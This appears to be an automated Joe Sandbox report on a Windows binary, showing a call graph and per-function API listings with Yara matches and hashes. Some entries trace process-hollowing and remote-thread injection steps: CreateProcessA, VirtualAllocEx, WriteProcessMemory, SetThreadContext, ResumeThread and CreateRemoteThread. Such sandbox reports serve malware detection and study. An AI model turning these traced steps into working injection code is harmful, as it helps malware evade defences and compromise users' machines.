16076 ac1af7 _Ungetc 42 API calls 16072->16076 16087 abb570 16073->16087 16074->16067 16075 ac1af7 _Ungetc 42 API calls 16074->16075 16077 abb645 16075->16077 16078 abb607 16076->16078 16080 ac1af7 _Ungetc 42 API calls 16077->16080 16086 abb668 16077->16086 16079 ac1af7 _Ungetc 42 API calls 16078->16079 16079->16074 16082 abb651 16080->16082 16081 ac22c3 _Fputc 44 API calls 16081->16067 16083 ac1af7 _Ungetc 42 API calls 
16082->16083 16082->16086 16084 abb65d 16083->16084 16085 ac1af7 _Ungetc 42 API calls 16084->16085 16085->16086 16086->16067 16086->16081 16088 abb2ed Concurrency::cancel_current_task LeaveCriticalSection 16087->16088 16089 abb576 16088->16089 16089->16063 16091 abc445 16090->16091 16097 abc46d 16090->16097 16092 abc452 16091->16092 16093 abc474 16091->16093 16091->16097 16094 aba412 _Fputc 42 API calls 16092->16094 16098 abc390 16093->16098 16094->16097 16097->16044 16099 abc39c __FrameHandler3::FrameUnwindToState 16098->16099 16106 abb2d9 EnterCriticalSection 16099->16106 16101 abc3aa 16107 abc3eb 16101->16107 16106->16101 16108 ac3b73 43 API calls 16107->16108 16109 abc403 16108->16109 16110 abc4ae 67 API calls 16109->16110 16111 abc421 16110->16111 16112 ac3c1f 67 API calls 16111->16112 16113 abc3b7 16112->16113 16114 abc3df 16113->16114 16115 abb2ed Concurrency::cancel_current_task LeaveCriticalSection 16114->16115 16116 abc3c8 16115->16116 16116->16044 16118 ab8ed8 GetLastError 16117->16118 16119 ab8ed5 16117->16119 16122 aba043 16118->16122 16119->15978 16123 ab9ee2 ___vcrt_FlsSetValue 5 API calls 16122->16123 16124 aba05d 16123->16124 16125 aba075 TlsGetValue 16124->16125 16126 ab8eed SetLastError 16124->16126 16125->16126 16126->15978 16130 ab29b0 16127->16130 16131 ab29cd 16130->16131 16132 ab29c4 std::ios_base::_Init 16130->16132 16131->15980 16132->16131 16133 ab2000 std::ios_base::_Init 43 API calls 16132->16133 16144 ab59ab EnterCriticalSection 16134->16144 16136 ab5019 16136->16002 16138 ab4f53 16137->16138 16139 ab4f45 ReleaseSRWLockExclusive 16137->16139 16138->16002 16139->16138 16140->16002 16145 ab59b9 LeaveCriticalSection 16141->16145 16143 ab3369 16143->15941 16144->16136 16145->16143 16147 ab2a47 16146->16147 16148 ab2a57 std::ios_base::_Ios_base_dtor 16146->16148 16147->16148 16149 aba49f std::_Throw_Cpp_error 42 API calls 16147->16149 16148->15912 16150 ab2a6b 16149->16150 16150->15912 18547 ab47d5 18548 ab47ef 18547->18548 18549 ab4801 
18548->18549 18551 ab3512 18548->18551 18554 abb956 18551->18554 18555 abb962 __FrameHandler3::FrameUnwindToState 18554->18555 18556 abb969 18555->18556 18557 abb980 18555->18557 18559 abd381 __Wcrtomb 14 API calls 18556->18559 18567 abb2d9 EnterCriticalSection 18557->18567 18561 abb96e 18559->18561 18560 abb98f 18568 abb8a0 18560->18568 18563 aba48f __strnicoll 42 API calls 18561->18563 18565 ab3524 18563->18565 18564 abb99d 18582 abb9cc 18564->18582 18565->18549 18567->18560 18569 abb940 _Ungetc 18568->18569 18570 abb8b6 18568->18570 18569->18564 18570->18569 18571 abb8e4 18570->18571 18572 ac2467 _Ungetc 14 API calls 18570->18572 18571->18569 18573 ac1af7 _Ungetc 42 API calls 18571->18573 18572->18571 18574 abb8f6 18573->18574 18575 abb919 18574->18575 18576 ac1af7 _Ungetc 42 API calls 18574->18576 18575->18569 18585 abb793 18575->18585 18577 abb902 18576->18577 18577->18575 18579 ac1af7 _Ungetc 42 API calls 18577->18579 18580 abb90e 18579->18580 18581 ac1af7 _Ungetc 42 API calls 18580->18581 18581->18575 18614 abb2ed LeaveCriticalSection 18582->18614 18584 abb9d2 18584->18565 18586 ac1af7 _Ungetc 42 API calls 18585->18586 18587 abb7b6 18586->18587 18588 ac1af7 _Ungetc 42 API calls 18587->18588 18595 abb7df 18587->18595 18589 abb7c4 18588->18589 18592 ac1af7 _Ungetc 42 API calls 18589->18592 18589->18595 18591 abb819 18596 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18591->18596 18593 abb7d2 18592->18593 18594 ac1af7 _Ungetc 42 API calls 18593->18594 18594->18595 18595->18591 18598 ac242d 18595->18598 18597 abb897 18596->18597 18597->18569 18599 ac2440 _Fputc 18598->18599 18604 ac22c3 18599->18604 18601 ac2455 18602 aba1cb _Fputc 42 API calls 18601->18602 18603 ac2462 18602->18603 18603->18591 18606 ac22d8 18604->18606 18605 ac2319 18608 ac22dc codecvt _Fputc 18605->18608 18610 ac5467 _Fputc WideCharToMultiByte 18605->18610 18613 ac2305 codecvt 18605->18613 18606->18605 18607 abadd0 _Fputc 42 API calls 18606->18607 18606->18608 
18606->18613 18607->18605 18608->18601 18609 aba412 _Fputc 42 API calls 18609->18608 18611 ac23d4 18610->18611 18611->18608 18612 ac23ea GetLastError 18611->18612 18612->18608 18612->18613 18613->18608 18613->18609 18614->18584 18618 ab4122 18619 ab4129 18618->18619 18620 ab4175 18618->18620 18623 abb2d9 EnterCriticalSection 18619->18623 18622 ab412e 18623->18622 17383 ab1020 17388 ab3685 17383->17388 17385 ab1033 17386 ab5fe6 45 API calls 17385->17386 17387 ab103d 17386->17387 17389 ab3691 __EH_prolog3 17388->17389 17392 ab4644 17389->17392 17391 ab36e3 codecvt 17391->17385 17401 ab408a 17392->17401 17394 ab464f 17409 ab4cb8 17394->17409 17396 ab4662 17397 ab467c 17396->17397 17398 ab29b0 std::ios_base::_Init 43 API calls 17396->17398 17399 ab4688 17397->17399 17413 ab576c 17397->17413 17398->17397 17399->17391 17402 ab4096 __EH_prolog3 17401->17402 17403 ab29b0 std::ios_base::_Init 43 API calls 17402->17403 17404 ab40c7 17403->17404 17405 ab5a28 codecvt 3 API calls 17404->17405 17406 ab40ce 17405->17406 17408 ab40df codecvt 17406->17408 17418 ab5193 17406->17418 17408->17394 17410 ab4cc4 __EH_prolog3 17409->17410 17539 ab35c8 17410->17539 17412 ab4cdc std::ios_base::_Ios_base_dtor codecvt 17412->17396 17414 ab4f98 std::_Lockit::_Lockit 7 API calls 17413->17414 17415 ab577c 17414->17415 17416 ab4ff0 std::_Lockit::~_Lockit 2 API calls 17415->17416 17417 ab57ba 17416->17417 17417->17399 17419 ab519f __EH_prolog3 17418->17419 17430 ab4f98 17419->17430 17424 ab51bd 17442 ab5319 17424->17442 17425 ab5218 codecvt 17425->17408 17429 ab51db 17450 ab4ff0 17429->17450 17431 ab4fae 17430->17431 17432 ab4fa7 17430->17432 17435 ab4fac 17431->17435 17462 ab59ab EnterCriticalSection 17431->17462 17457 abcae4 17432->17457 17435->17429 17436 ab52f6 17435->17436 17437 ab5a28 codecvt 3 API calls 17436->17437 17438 ab5301 17437->17438 17439 ab5315 17438->17439 17511 ab5027 17438->17511 17439->17424 17443 ab51c5 17442->17443 17444 ab5325 17442->17444 17446 ab50eb 17443->17446 17514 
ab5914 17444->17514 17447 ab50f9 17446->17447 17449 ab5105 ___std_exception_copy codecvt 17446->17449 17448 abc9fc ~ctype 14 API calls 17447->17448 17447->17449 17448->17449 17449->17429 17451 ab4ffa 17450->17451 17452 abcaf2 17450->17452 17453 ab500d 17451->17453 17537 ab59b9 LeaveCriticalSection 17451->17537 17538 abcacd LeaveCriticalSection 17452->17538 17453->17425 17456 abcaf9 17456->17425 17463 ac12b4 17457->17463 17462->17435 17484 ac0bba 17463->17484 17472 ac0c22 std::_Lockit::_Lockit 5 API calls 17473 ac12cd 17472->17473 17496 ac0c3c 17473->17496 17483 ac12e6 17483->17483 17485 ac0da3 __purecall 5 API calls 17484->17485 17486 ac0bd0 17485->17486 17487 ac0bd4 17486->17487 17488 ac0da3 __purecall 5 API calls 17487->17488 17489 ac0bea 17488->17489 17490 ac0bee 17489->17490 17491 ac0da3 __purecall 5 API calls 17490->17491 17492 ac0c04 17491->17492 17493 ac0c08 17492->17493 17494 ac0da3 __purecall 5 API calls 17493->17494 17495 ac0c1e 17494->17495 17495->17472 17497 ac0da3 __purecall 5 API calls 17496->17497 17498 ac0c52 17497->17498 17499 ac0c56 17498->17499 17500 ac0da3 __purecall 5 API calls 17499->17500 17501 ac0c6c 17500->17501 17502 ac0c70 17501->17502 17503 ac0da3 __purecall 5 API calls 17502->17503 17504 ac0c86 17503->17504 17505 ac0ca4 17504->17505 17506 ac0da3 __purecall 5 API calls 17505->17506 17507 ac0cba 17506->17507 17508 ac0c8a 17507->17508 17509 ac0da3 __purecall 5 API calls 17508->17509 17510 ac0ca0 17509->17510 17510->17483 17512 ab50eb _Yarn 14 API calls 17511->17512 17513 ab5061 17512->17513 17513->17424 17515 abb171 17514->17515 17516 ab5924 EncodePointer 17514->17516 17517 ac1478 _unexpected 2 API calls 17515->17517 17516->17443 17518 abb176 17517->17518 17519 abb181 17518->17519 17520 ac14bd _unexpected 42 API calls 17518->17520 17521 abb18b IsProcessorFeaturePresent 17519->17521 17522 abb1aa 17519->17522 17520->17519 17523 abb197 17521->17523 17524 abe451 _unexpected 23 API calls 17522->17524 17525 aba293 _unexpected 8 API calls 

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 014902FC
                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0149030F
                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0149032D
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01490351
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0149037C
                                                                                • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 014903D4
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0149041F
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0149045D
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 01490499
                                                                                • ResumeThread.KERNELBASE(?), ref: 014904A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1951644279.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1490000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                • String ID: GetP$Load$aryA$ress
                                                                                • API String ID: 2687962208-977067982
                                                                                • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                • Instruction ID: fe5aaef3fff1a33323b1d95de8c657ade2fc26dad308b74ee9beb8ed128bd5b1
                                                                                • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                • Instruction Fuzzy Hash: 78B1E67260024AAFDB60CF68CC80BDA77A9FF88714F158565EA0CEB351D774FA418B94

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00AB2F82
                                                                                • CreateRemoteThread.KERNELBASE(000000FF,00000000,00000000,?,00AD8038,00000000,00000000), ref: 00AB308A
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00AB3093
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocCreateObjectRemoteSingleThreadVirtualWait
                                                                                • String ID: 0000000006:1@0000000005:@$Unknown exception
                                                                                • API String ID: 3786092462-2488675128
                                                                                • Opcode ID: d911740bc3f0809c022130326ed08dad356185615d1c08636abd57989ba82d99
                                                                                • Instruction ID: 0acb0a8a23c61f27172a90887783b30e3fac7352bb6208a0f5d6f13582f3c621
                                                                                • Opcode Fuzzy Hash: d911740bc3f0809c022130326ed08dad356185615d1c08636abd57989ba82d99
                                                                                • Instruction Fuzzy Hash: B65125B2A043409FD714EF34CC85BABBBE8AF99740F104A2DF99597283D770E6498752
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                • String ID: AAA$Zero
                                                                                • API String ID: 909987262-2547618886
                                                                                • Opcode ID: f6dbdaf813c6dc86a2b908d379a46ab16339cb9d5c745ef7ddf53e4f5d825abc
                                                                                • Instruction ID: aef57259d25d150d177cfaa70aa291caf6e47574ecb8564edcd95081fe0d87a8
                                                                                • Opcode Fuzzy Hash: f6dbdaf813c6dc86a2b908d379a46ab16339cb9d5c745ef7ddf53e4f5d825abc
                                                                                • Instruction Fuzzy Hash: D381CC709083848FC315DF28C9847AABBE4BFD9308F148A6EE4D88B253C375D948CB52
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e958c4940cc239054154ca8a26f47bc97a62700420abd0387d75b9b13c3e8ec
                                                                                • Instruction ID: ea1aeca91db26d22b32a73ebc8e2f4d96d7fccc387ecf1e342855896a3d1718b
                                                                                • Opcode Fuzzy Hash: 9e958c4940cc239054154ca8a26f47bc97a62700420abd0387d75b9b13c3e8ec
                                                                                • Instruction Fuzzy Hash: 39F0A032710664DBCB12D748C505F8973BCEB06B55F12009AF200DB251C770EE00CBC0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,83CA0057,?,00AC0DE5,?,?,?,00000000), ref: 00AC0D99
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3664257935-537541572
                                                                                • Opcode ID: 31fef8f62426999081fc5de0ed9661db7dc1307792c3975bc4040ebd01f198d9
                                                                                • Instruction ID: 5053de23bc0b6912dbb030fc063edc18a63e2bd97ac7211485e9cf48a8820f5f
                                                                                • Opcode Fuzzy Hash: 31fef8f62426999081fc5de0ed9661db7dc1307792c3975bc4040ebd01f198d9
                                                                                • Instruction Fuzzy Hash: 7B21C035A41211EBCB229BA4EC44F9A3769EB417B0B260628F917A7290EB70FD01C6D1

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • FreeConsole.KERNELBASE ref: 00AB3103
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00AB3148
                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00AB3176
                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00AB317D
                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00AB3184
                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00AB318B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Cpp_errorThrow_std::_$ConsoleCurrentFreeThread
                                                                                • String ID:
                                                                                • API String ID: 4273603408-0
                                                                                • Opcode ID: 239056730ff4087a25dfda539603b8cb7fedc83c5ed98b88d9718c298bb30b82
                                                                                • Instruction ID: 584cf6986d97b9eb60d7654e3c6d7369c0f18d6de3872a3a944ee686c5a48c19
                                                                                • Opcode Fuzzy Hash: 239056730ff4087a25dfda539603b8cb7fedc83c5ed98b88d9718c298bb30b82
                                                                                • Instruction Fuzzy Hash: 1901A27264030176EE01B7B89E07BEA7A9D5F00B41F048528FA49590C3FFF09A008663

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • __alloca_probe_16.LIBCMT ref: 00AC477D
                                                                                • __alloca_probe_16.LIBCMT ref: 00AC483E
                                                                                • __freea.LIBCMT ref: 00AC48A5
                                                                                  • Part of subcall function 00AC3C5D: HeapAlloc.KERNEL32(00000000,00AC6376,?,?,00AC6376,00000220,?,00000000,?), ref: 00AC3C8F
                                                                                • __freea.LIBCMT ref: 00AC48BA
                                                                                • __freea.LIBCMT ref: 00AC48CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                • String ID:
                                                                                • API String ID: 1096550386-0
                                                                                • Opcode ID: 0f8e7f0574371b1d58e5c0a6d47e5c08221353feaa2234f0f8aa6948c94c2d57
                                                                                • Instruction ID: 7520e70f6b6f64ef8e93c8869f44a6aff0c2c108a6a1c3dd3e2866d2c7ca1b0b
                                                                                • Opcode Fuzzy Hash: 0f8e7f0574371b1d58e5c0a6d47e5c08221353feaa2234f0f8aa6948c94c2d57
                                                                                • Instruction Fuzzy Hash: B651C372A00246AFEF219FA4CD91FBB3AA9EF49750B16012DFD08E7241E771DC5087A4

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateThread.KERNELBASE(?,?,Function_0000AF79,00000000,?,?), ref: 00ABB11E
                                                                                • GetLastError.KERNEL32 ref: 00ABB12A
                                                                                • __dosmaperr.LIBCMT ref: 00ABB131
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateErrorLastThread__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 2744730728-0
                                                                                • Opcode ID: 59a3b4484616a1be96d7ee1fa84a86a4e79d8c5c23a34d0be26228876ba874f0
                                                                                • Instruction ID: 14e46c8e2264524a72ebaebd1c6398b00aa280ddab755d8a6a575a50ba980f10
                                                                                • Opcode Fuzzy Hash: 59a3b4484616a1be96d7ee1fa84a86a4e79d8c5c23a34d0be26228876ba874f0
                                                                                • Instruction Fuzzy Hash: EB018872510209ABDF15EFA4EC16AEE3BA9FF00360F000158B81196192EBB1CE40DBA1

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000), ref: 00AB32A1
                                                                                • GetExitCodeThread.KERNEL32(?,?), ref: 00AB32BA
                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00AB32CC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ChangeCloseCodeExitFindNotificationObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3816883391-0
                                                                                • Opcode ID: 2dadf3b87a64da04496a7492d9dcb559856c15543a8c20a6de190177c74e56e9
                                                                                • Instruction ID: beb6327e63be62a4b11675afc01a5fa779df509de8e107e85ee98ebc94241fc2
                                                                                • Opcode Fuzzy Hash: 2dadf3b87a64da04496a7492d9dcb559856c15543a8c20a6de190177c74e56e9
                                                                                • Instruction Fuzzy Hash: DEF05E32640118ABDF20CFA5DC06BD93A68EB11770F240710B925EA1E4D370DE529690

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 207 abb02e-abb03b call ac06e1 210 abb07b-abb07e ExitThread 207->210 211 abb03d-abb045 207->211 211->210 212 abb047-abb04b 211->212 213 abb04d call ac127b 212->213 214 abb052-abb058 212->214 213->214 216 abb05a-abb05c 214->216 217 abb065-abb06b 214->217 216->217 218 abb05e-abb05f CloseHandle 216->218 217->210 219 abb06d-abb06f 217->219 218->217 219->210 220 abb071-abb075 FreeLibraryAndExitThread 219->220 220->210
                                                                                APIs
                                                                                  • Part of subcall function 00AC06E1: GetLastError.KERNEL32(00000000,?,00ABD386,00AC0ABD,?,?,00AC05DD,00000001,00000364,?,00000002,000000FF,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC06E5
                                                                                  • Part of subcall function 00AC06E1: SetLastError.KERNEL32(00000000), ref: 00AC0787
                                                                                • CloseHandle.KERNEL32(?,?,?,00ABB165,?,?,00ABAFD7,00000000), ref: 00ABB05F
                                                                                • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00ABB165,?,?,00ABAFD7,00000000), ref: 00ABB075
                                                                                • ExitThread.KERNEL32 ref: 00ABB07E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                • String ID:
                                                                                • API String ID: 1991824761-0
                                                                                • Opcode ID: f0e33e0c67b6fd993695023fe92b5f3724078dee12838790fce71578fcec6350
                                                                                • Instruction ID: 2ab8b9a98d69bfa1f325afecb21fb8bcfc98b54b51efa7b4e8a1e4843851c0b8
                                                                                • Opcode Fuzzy Hash: f0e33e0c67b6fd993695023fe92b5f3724078dee12838790fce71578fcec6350
                                                                                • Instruction Fuzzy Hash: 66F05E30110604ABDB31AB76C848FBB7AAD6F00361B094A24F836C71B3DBA0DC42C6B0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000002,?,00ABE306,00ABB1B4,00ABB1B4,?,00000002,83CA0057,00ABB1B4,00000002), ref: 00ABE31D
                                                                                • TerminateProcess.KERNEL32(00000000,?,00ABE306,00ABB1B4,00ABB1B4,?,00000002,83CA0057,00ABB1B4,00000002), ref: 00ABE324
                                                                                • ExitProcess.KERNEL32 ref: 00ABE336
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 8e2a07e260a662e9b38918440cd1bdd3200c32c09fb3bc24b5a0d5f76241b2f3
                                                                                • Instruction ID: 92e4b7aeae5769f66ee80c67b238068f496ab1d5168548521c3d46458b2f058e
                                                                                • Opcode Fuzzy Hash: 8e2a07e260a662e9b38918440cd1bdd3200c32c09fb3bc24b5a0d5f76241b2f3
                                                                                • Instruction Fuzzy Hash: 4BD06731040544ABCB01EFA1ED0D9D93F69AB443427454420BA054A022DB7299529B81

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
